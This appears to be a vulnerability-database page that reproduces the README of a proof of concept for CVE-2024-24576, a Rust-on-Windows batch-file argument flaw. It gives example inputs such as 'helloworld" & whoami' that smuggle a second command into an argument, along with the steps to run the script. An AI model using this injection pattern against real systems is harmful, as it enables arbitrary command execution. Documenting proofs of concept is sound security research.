CVE-2024-24576 PoC — Rust 安全漏洞

Source

Associated Vulnerability

Description

PoC for CVE-2024-24576 vulnerability "BatBadBut"

Readme

# CVE-2024-24576-PoC-BatBadBut

PoC for CVE-2024-24576 vulnerability "BatBadBut"

## Information

After running the script will ask you for an argument, the argument will be passed the the bat file, if you close the argument with " and after that & you can run any Windows command.
For example:
```cmd
helloworld" & whoami
```

As a result, you will get the whoami command.

Of course in real time it would not look like that, this is just PoC for the CVE.

## Usage

Clone the repository:
``` cmd
git clone https://github.com/SheL3G/CVE-2024-24576-PoC-BatBadBut.git
```

Running the script:
```py
Python CVE-2024-24576.py
```
To make it work type something close with " and then "&" and any command like calc.exe, hostname, whoami...
```cmd
HelloWorld" & hostname
```
The Flow of the CVE and the possible way to make it work
![Flow](https://flatt.tech/research/batbadbut-you-cant-securely-execute-commands-on-windows/flowchart.svg)

## Credits

* [NIST](https://nvd.nist.gov/vuln/detail/CVE-2024-24576)

* [flatt.tech](https://flatt.tech/research/posts/batbadbut-you-cant-securely-execute-commands-on-windows/)

* [Mental Outlow](https://www.youtube.com/watch?v=jqsoSmOBFrQ)

## License

[MIT](https://choosealicense.com/licenses/mit/)

File Snapshot

 [4.0K]  /data/pocs/8e60c7f609ecbbc2ca654b6b3194029e31b71030
├── [1.1K]  CVE-2024-24576.py
├── [1.0K]  LICENSE
├── [  36]  poc.bat
└── [1.2K]  README.md

0 directories, 4 files

Remarks